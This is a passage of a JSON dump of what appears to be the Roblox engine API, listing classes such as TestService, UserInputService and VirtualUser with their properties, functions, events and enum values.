on"},{"ReturnType":"void","Arguments":[],"Name":"ConvertToSmooth","tags":["PluginSecurity"],"Class":"TerrainRegion","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"TestService","tags":[]},{"ValueType":"bool","type":"Property","Name":"AutoRuns","tags":[],"Class":"TestService"},{"ValueType":"string","type":"Property","Name":"Description","tags":[],"Class":"TestService"},{"ValueType":"int","type":"Property","Name":"ErrorCount","tags":["readonly"],"Class":"TestService"},{"ValueType":"bool","type":"Property","Name":"Is30FpsThrottleEnabled","tags":[],"Class":"TestService"},{"ValueType":"bool","type":"Property","Name":"IsPhysicsEnvironmentalThrottled","tags":[],"Class":"TestService"},{"ValueType":"bool","type":"Property","Name":"IsSleepAllowed","tags":[],"Class":"TestService"},{"ValueType":"int","type":"Property","Name":"NumberOfPlayers","tags":[],"Class":"TestService"},{"ValueType":"double","type":"Property","Name":"SimulateSecondsLag","tags":[],"Class":"TestService"},{"ValueType":"int","type":"Property","Name":"TestCount","tags":["readonly"],"Class":"TestService"},{"ValueType":"double","type":"Property","Name":"Timeout","tags":[],"Class":"TestService"},{"ValueType":"int","type":"Property","Name":"WarnCount","tags":["readonly"],"Class":"TestService"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"condition","Default":null},{"Type":"string","Name":"description","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Check","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"text","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Checkpoint","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Done","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"description","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Error","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"description","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Fail","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"text","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Message","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"condition","Default":null},{"Type":"string","Name":"description","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Require","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"condition","Default":null},{"Type":"string","Name":"description","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Warn","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Run","tags":["PluginSecurity"],"Class":"TestService","type":"YieldFunction"},{"Arguments":[{"Name":"condition","Type":"bool"},{"Name":"text","Type":"string"},{"Name":"script","Type":"Instance"},{"Name":"line","Type":"int"}],"Name":"ServerCollectConditionalResult","tags":[],"Class":"TestService","type":"Event"},{"Arguments":[{"Name":"text","Type":"string"},{"Name":"script","Type":"Instance"},{"Name":"line","Type":"int"}],"Name":"ServerCollectResult","tags":[],"Class":"TestService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"TextService","tags":["notCreatable"]},{"ReturnType":"Vector2","Arguments":[{"Type":"string","Name":"string","Default":null},{"Type":"int","Name":"fontSize","Default":null},{"Type":"Font","Name":"font","Default":null},{"Type":"Vector2","Name":"frameSize","Default":null}],"Name":"GetTextSize","tags":["RobloxScriptSecurity"],"Class":"TextService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"TimerService","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"Toolbar","tags":[]},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"text","Default":null},{"Type":"string","Name":"tooltip","Default":null},{"Type":"string","Name":"iconname","Default":null}],"Name":"CreateButton","tags":["PluginSecurity"],"Class":"Toolbar","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"TouchInputService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"TouchTransmitter","tags":["notCreatable","notbrowsable"]},{"Superclass":"Instance","type":"Class","Name":"TweenService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"UserGameSettings","tags":[]},{"ValueType":"bool","type":"Property","Name":"AllTutorialsDisabled","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"CustomCameraMode","type":"Property","Name":"CameraMode","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"ComputerCameraMovementMode","type":"Property","Name":"ComputerCameraMovementMode","tags":[],"Class":"UserGameSettings"},{"ValueType":"ComputerMovementMode","type":"Property","Name":"ComputerMovementMode","tags":[],"Class":"UserGameSettings"},{"ValueType":"ControlMode","type":"Property","Name":"ControlMode","tags":[],"Class":"UserGameSettings"},{"ValueType":"bool","type":"Property","Name":"Fullscreen","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"UploadSetting","type":"Property","Name":"ImageUploadPromptBehavior","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"float","type":"Property","Name":"MasterVolume","tags":[],"Class":"UserGameSettings"},{"ValueType":"float","type":"Property","Name":"MouseSensitivity","tags":[],"Class":"UserGameSettings"},{"ValueType":"RotationType","type":"Property","Name":"RotationType","tags":[],"Class":"UserGameSettings"},{"ValueType":"SavedQualitySetting","type":"Property","Name":"SavedQualityLevel","tags":[],"Class":"UserGameSettings"},{"ValueType":"TouchCameraMovementMode","type":"Property","Name":"TouchCameraMovementMode","tags":[],"Class":"UserGameSettings"},{"ValueType":"TouchMovementMode","type":"Property","Name":"TouchMovementMode","tags":[],"Class":"UserGameSettings"},{"ValueType":"bool","type":"Property","Name":"UsedHideHudShortcut","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"int","type":"Property","Name":"VRRotationIntensity","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"UploadSetting","type":"Property","Name":"VideoUploadPromptBehavior","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"tutorialId","Default":null}],"Name":"GetTutorialState","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"InFullScreen","tags":[],"Class":"UserGameSettings","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"InStudioMode","tags":[],"Class":"UserGameSettings","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"tutorialId","Default":null},{"Type":"bool","Name":"value","Default":null}],"Name":"SetTutorialState","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings","type":"Function"},{"Arguments":[{"Name":"isFullscreen","Type":"bool"}],"Name":"FullscreenChanged","tags":[],"Class":"UserGameSettings","type":"Event"},{"Arguments":[{"Name":"isStudioMode","Type":"bool"}],"Name":"StudioModeChanged","tags":[],"Class":"UserGameSettings","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"UserInputService","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"AccelerometerEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"GamepadEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"GyroscopeEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"KeyboardEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"ModalEnabled","tags":[],"Class":"UserInputService"},{"ValueType":"MouseBehavior","type":"Property","Name":"MouseBehavior","tags":[],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"MouseEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"MouseIconEnabled","tags":[],"Class":"UserInputService"},{"ValueType":"OverrideMouseIconBehavior","type":"Property","Name":"OverrideMouseIconBehavior","tags":["RobloxScriptSecurity"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"TouchEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"CoordinateFrame","type":"Property","Name":"UserHeadCFrame","tags":["deprecated","readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"VREnabled","tags":["readonly"],"Class":"UserInputService"},{"ReturnType":"bool","Arguments":[{"Type":"UserInputType","Name":"gamepadNum","Default":null},{"Type":"KeyCode","Name":"gamepadKeyCode","Default":null}],"Name":"GamepadSupports","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetConnectedGamepads","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetDeviceAcceleration","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetDeviceGravity","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Tuple","Arguments":[],"Name":"GetDeviceRotation","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetFocusedTextBox","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UserInputType","Name":"gamepadNum","Default":null}],"Name":"GetGamepadConnected","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Array","Arguments":[{"Type":"UserInputType","Name":"gamepadNum","Default":null}],"Name":"GetGamepadState","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetKeysPressed","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"UserInputType","Arguments":[],"Name":"GetLastInputType","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetNavigationGamepads","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Platform","Arguments":[],"Name":"GetPlatform","tags":["RobloxScriptSecurity"],"Class":"UserInputService","type":"Function"},{"ReturnType":"Array","Arguments":[{"Type":"UserInputType","Name":"gamepadNum","Default":null}],"Name":"GetSupportedGamepadKeyCodes","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"CoordinateFrame","Arguments":[{"Type":"UserCFrame","Name":"type","Default":null}],"Name":"GetUserCFrame","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"KeyCode","Name":"keyCode","Default":null}],"Name":"IsKeyDown","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UserInputType","Name":"gamepadEnum","Default":null}],"Name":"IsNavigationGamepad","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RecenterUserHeadCFrame","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"UserInputType","Name":"gamepadEnum","Default":null},{"Type":"bool","Name":"enabled","Default":null}],"Name":"SetNavigationGamepad","tags":[],"Class":"UserInputService","type":"Function"},{"Arguments":[{"Name":"acceleration","Type":"Instance"}],"Name":"DeviceAccelerationChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"gravity","Type":"Instance"}],"Name":"DeviceGravityChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"rotation","Type":"Instance"},{"Name":"cframe","Type":"CoordinateFrame"}],"Name":"DeviceRotationChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"gamepadNum","Type":"UserInputType"}],"Name":"GamepadConnected","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"gamepadNum","Type":"UserInputType"}],"Name":"GamepadDisconnected","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"InputBegan","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"InputChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"InputEnded","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[],"Name":"JumpRequest","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"lastInputType","Type":"UserInputType"}],"Name":"LastInputTypeChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"textboxReleased","Type":"Instance"}],"Name":"TextBoxFocusReleased","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"textboxFocused","Type":"Instance"}],"Name":"TextBoxFocused","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touch","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchEnded","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"state","Type":"UserInputState"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchLongPress","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touch","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchMoved","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"totalTranslation","Type":"Vector2"},{"Name":"velocity","Type":"Vector2"},{"Name":"state","Type":"UserInputState"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchPan","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"scale","Type":"float"},{"Name":"velocity","Type":"float"},{"Name":"state","Type":"UserInputState"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchPinch","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"rotation","Type":"float"},{"Name":"velocity","Type":"float"},{"Name":"state","Type":"UserInputState"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchRotate","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touch","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchStarted","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"swipeDirection","Type":"SwipeDirection"},{"Name":"numberOfTouches","Type":"int"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchSwipe","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchTap","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"type","Type":"UserCFrame"},{"Name":"value","Type":"CoordinateFrame"}],"Name":"UserCFrameChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[],"Name":"WindowFocusReleased","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[],"Name":"WindowFocused","tags":[],"Class":"UserInputService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Vector3Value","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Value","tags":[],"Class":"Vector3Value"},{"Arguments":[{"Name":"value","Type":"Vector3"}],"Name":"Changed","tags":[],"Class":"Vector3Value","type":"Event"},{"Arguments":[{"Name":"value","Type":"Vector3"}],"Name":"changed","tags":["deprecated"],"Class":"Vector3Value","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"VirtualUser","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"Button1Down","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"Button1Up","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"Button2Down","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"Button2Up","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"CaptureController","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"ClickButton1","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"ClickButton2","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"MoveMouse","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"SetKeyDown","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"SetKeyUp","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StartRecording","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"StopRecording","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"TypeKey","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Visit","tags":["notCreatable"]},{"ReturnType":"string","Arguments":[],"Name":"GetUploadUrl","tags":["RobloxSecurity"],"Class":"Visit","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"pingUrl","Default":null},{"Type":"int","Name":"interval","Default":null}],"Name":"SetPing","tags":["RobloxSecurity"],"Class":"Visit","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetUploadUrl","tags":["RobloxSecurity"],"Class":"Visit","type":"Function"},{"type":"Enum","Name":"AASamples","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":1,"Enum":"AASamples"},{"type":"EnumItem","Name":"4","tags":[],"Value":4,"Enum":"AASamples"},{"type":"EnumItem","Name":"8","tags":[],"Value":8,"Enum":"AASamples"},{"type":"Enum","Name":"AccessType","tags":[]},{"type":"EnumItem","Name":"Me","tags":[],"Value":0,"Enum":"AccessType"},{"type":"EnumItem","Name":"Friends","tags":[],"Value":1,"Enum":"AccessType"},{"type":"EnumItem","Name":"Everyone","tags":[],"Value":2,"Enum":"AccessType"},{"type":"EnumItem","Name":"InviteOnly","tags":[],"Value":3,"Enum":"AccessType"},{"type":"Enum","Name":"ActionType","tags":[]},{"type":"EnumItem","Name":"Nothing","tags":[],"Value":0,"Enum":"ActionType"},{"type":"EnumItem","Name":"Pause","tags":[],"Value":1,"Enum":"ActionType"},{"type":"EnumItem","Name":"Lose","tags":[],"Value":2,"Enum":"ActionType"},{"type":"EnumItem","Name":"Draw","tags":[],"Value":3,"Enum":"ActionType"},{"type":"EnumItem","Name":"Win","tags":[],"Value":4,"Enum":"ActionType"},{"type":"Enum","Name":"ActuatorType","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"ActuatorType"},{"type":"EnumItem","Name":"Motor","tags":[],"Value":1,"Enum":"ActuatorType"},{"type":"EnumItem","Name":"Servo","tags":[],"Value":2,"Enum":"ActuatorType"},{"type":"Enum","Name":"AnimationPriority","tags":[]},{"type":"EnumItem","Name":"Idle","tags":[],"Value":0,"Enum":"AnimationPriority"},{"type":"EnumItem","Name":"Movement","tags":[],"Value":1,"Enum":"AnimationPriority"},{"type":"EnumItem","Name":"Action","tags":[],"Value":2,"Enum":"AnimationPriority"},{"type":"EnumItem","Name":"Core","tags":[],"Value":1000,"Enum":"AnimationPriority"},{"type":"Enum","Name":"Antialiasing","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"Antialiasing"},{"type":"EnumItem","Name":"Off","tags":[],"Value":2,"Enum":"Antialiasing"},{"type":"EnumItem","Name":"On","tags":[],"Value":1,"Enum":"Antialiasing"},{"type":"Enum","Name":"Axis","tags":[]},{"type":"EnumItem","Name":"X","tags":[],"Value":0,"Enum":"Axis"},{"type":"EnumItem","Name":"Y","tags":[],"Value":1,"Enum":"Axis"},{"type":"EnumItem","Name":"Z","tags":[],"Value":2,"Enum":"Axis"},{"type":"Enum","Name":"BinType","tags":[]},{"type":"EnumItem","Name":"Script","tags":[],"Value":0,"Enum":"BinType"},{"type":"EnumItem","Name":"GameTool","tags":[],"Value":1,"Enum":"BinType"},{"type":"EnumItem","Name":"Grab","tags":[],"Value":2,"Enum":"BinType"},{"type":"EnumItem","Name":"Clone","tags":[],"Value":3,"Enum":"BinType"},{"type":"EnumItem","Name":"Hammer","tags":[],"Value":4,"Enum":"BinType"},{"type":"Enum","Name":"BodyPart","tags":[]},{"type":"EnumItem","Name":"Head","tags":[],"Value":0,"Enum":"BodyPart"},{"type":"EnumItem","Name":"Torso","tags":[],"Value":1,"Enum":"BodyPart"},{"type":"EnumItem","Name":"LeftArm","tags":[],"Value":2,"Enum":"BodyPart"},{"type":"EnumItem","Name":"RightArm","tags":[],"Value":3,"Enum":"BodyPart"},{"type":"EnumItem","Name":"LeftLeg","tags":[],"Value":4,"Enum":"BodyPart"},{"type":"EnumItem","Name":"RightLeg","tags":[],"Value":5,"Enum":"BodyPart"},{"type":"Enum","Name":"Button","tags":[]},{"type":"EnumItem","Name":"Jump","tags":[],"Value":32,"Enum":"Button"},{"type":"EnumItem","Name":"Dismount","tags":[],"Value":8,"Enum":"Button"},{"type":"Enum","Name":"ButtonStyle","tags":[]},{"type":"EnumItem","Name":"Custom","tags":[],"Value":0,"Enum":"ButtonStyle"},{"type":"EnumItem","Name":"RobloxButtonDefault","tags":[],"Value":1,"Enum":"ButtonStyle"},{"type":"EnumItem","Name":"RobloxButton","tags":[],"Value":2,"Enum":"ButtonStyle"},{"type":"EnumItem","Name":"RobloxRoundButton","tags":[],"Value":3,"Enum":"ButtonStyle"},{"type":"EnumItem","Name":"RobloxRoundDefaultButton","tags":[],"Value":4,"Enum":"ButtonStyle"},{"type":"EnumItem","Name":"RobloxRoundDropdownButton","tags":[],"Value":5,"Enum":"ButtonStyle"},{"type":"Enum","Name":"CameraMode","tags":[]},{"type":"EnumItem","Name":"Classic","tags":[],"Value":0,"Enum":"CameraMode"},{"type":"EnumItem","Name":"LockFirstPerson","tags":[],"Value":1,"Enum":"CameraMode"},{"type":"Enum","Name":"CameraPanMode","tags":[]},{"type":"EnumItem","Name":"Classic","tags":[],"Value":0,"Enum":"CameraPanMode"},{"type":"EnumItem","Name":"EdgeBump","tags":[],"Value":1,"Enum":"CameraPanMode"},{"type":"Enum","Name":"CameraType","tags":[]},{"type":"EnumItem","Name":"Fixed","tags":[],"Value":0,"Enum":"CameraType"},{"type":"EnumItem","Name":"Watch","tags":[],"Value":2,"Enum":"CameraType"},{"type":"EnumItem","Name":"Attach","tags":[],"Value":1,"Enum":"CameraType"},{"type":"EnumItem","Name":"Track","tags":[],"Value":3,"Enum":"CameraType"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":4,"Enum":"CameraType"},{"type":"EnumItem","Name":"Custom","tags":[],"Value":5,"Enum":"CameraType"},{"type":"EnumItem","Name":"Scriptable","tags":[],"Value":6,"Enum":"CameraType"},{"type":"Enum","Name":"CellBlock","tags":[]},{"type":"EnumItem","Name":"Solid","tags":[],"Value":0,"Enum":"CellBlock"},{"type":"EnumItem","Name":"VerticalWedge","tags":[],"Value":1,"Enum":"CellBlock"},{"type":"EnumItem","Name":"CornerWedge","tags":[],"Value":2,"Enum":"CellBlock"},{"type":"EnumItem","Name":"InverseCornerWedge","tags":[],"Value":3,"Enum":"CellBlock"},{"type":"EnumItem","Name":"HorizontalWedge","tags":[],"Value":4,"Enum":"CellBlock"},{"type":"Enum","Name":"CellMaterial","tags":[]},{"type":"EnumItem","Name":"Empty","tags":[],"Value":0,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Grass","tags":[],"Value":1,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Sand","tags":[],"Value":2,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Brick","tags":[],"Value":3,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Granite","tags":[],"Value":4,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Asphalt","tags":[],"Value":5,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Iron","tags":[],"Value":6,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Aluminum","tags":[],"Value":7,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Gold","tags":[],"Value":8,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"WoodPlank","tags":[],"Value":9,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"WoodLog","tags":[],"Value":10,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Gravel","tags":[],"Value":11,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"CinderBlock","tags":[],"Value":12,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"MossyStone","tags":[],"Value":13,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Cement","tags":[],"Value":14,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"RedPlastic","tags":[],"Value":15,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"BluePlastic","tags":[],"Value":16,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Water","tags":[],"Value":17,"Enum":"CellMaterial"},{"type":"Enum","Name":"CellOrientation","tags":[]},{"type":"EnumItem","Name":"NegZ","tags":[],"Value":0,"Enum":"CellOrientation"},{"type":"EnumItem","Name":"X","tags":[],"Value":1,"Enum":"CellOrientation"},{"type":"EnumItem","Name":"Z","tags":[],"Value":2,"Enum":"CellOrientation"},{"type":"EnumItem","Name":"NegX","tags":[],"Value":3,"Enum":"CellOrientation"},{"type":"Enum","Name":"CenterDialogType","tags":[]},{"type":"EnumItem","Name":"UnsolicitedDialog","tags":[],"Value":1,"Enum":"CenterDialogType"},{"type":"EnumItem","Name":"PlayerInitiatedDialog","tags":[],"Value":2,"Enum":"CenterDialogType"},{"type":"EnumItem","Name":"ModalDialog","tags":[],"Value":3,"Enum":"CenterDialogType"},{"type":"EnumItem","Name":"QuitDialog","tags":[],"Value":4,"Enum":"CenterDialogType"},{"type":"Enum","Name":"ChatColor","tags":[]},{"type":"EnumItem","Name":"Blue","tags":[],"Value":0,"Enum":"ChatColor"},{"type":"EnumItem","Name":"Green","tags":[],"Value":1,"Enum":"ChatColor"},{"type":"EnumItem","Name":"Red","tags":[],"Value":2,"Enum":"ChatColor"},{"type":"Enum","Name":"ChatMode","tags":[]},{"type":"EnumItem","Name":"Menu","tags":[],"Value":0,"Enum":"ChatMode"},{"type":"EnumItem","Name":"TextAndMenu","tags":[],"Value":1,"Enum":"ChatMode"},{"type":"Enum","Name":"ChatStyle","tags":[]},{"type":"EnumItem","Name":"Classic","tags":[],"Value":0,"Enum":"ChatStyle"},{"type":"EnumItem","Name":"Bubble","tags":[],"Value":1,"Enum":"ChatStyle"},{"type":"EnumItem","Name":"ClassicAndBubble","tags":[],"Value":2,"Enum":"ChatStyle"},{"type":"Enum","Name":"CollisionFidelity","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"CollisionFidelity"},{"type":"EnumItem","Name":"Hull","tags":[],"Value":1,"Enum":"CollisionFidelity"},{"type":"EnumItem","Name":"Box","tags":[],"Value":2,"Enum":"CollisionFidelity"},{"type":"Enum","Name":"ComputerCameraMovementMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"ComputerCameraMovementMode"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":2,"Enum":"ComputerCameraMovementMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":1,"Enum":"ComputerCameraMovementMode"},{"type":"Enum","Name":"ComputerMovementMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"ComputerMovementMode"},{"type":"EnumItem","Name":"KeyboardMouse","tags":[],"Value":1,"Enum":"ComputerMovementMode"},{"type":"EnumItem","Name":"ClickToMove","tags":[],"Value":2,"Enum":"ComputerMovementMode"},{"type":"Enum","Name":"ConcurrencyModel","tags":[]},{"type":"EnumItem","Name":"Serial","tags":[],"Value":0,"Enum":"ConcurrencyModel"},{"type":"EnumItem","Name":"Safe","tags":[],"Value":1,"Enum":"ConcurrencyModel"},{"type":"EnumItem","Name":"Logical","tags":[],"Value":2,"Enum":"ConcurrencyModel"},{"type":"EnumItem","Name":"Empirical","tags":[],"Value":3,"Enum":"ConcurrencyModel"},{"type":"Enum","Name":"ControlMode","tags":[]},{"type":"Enu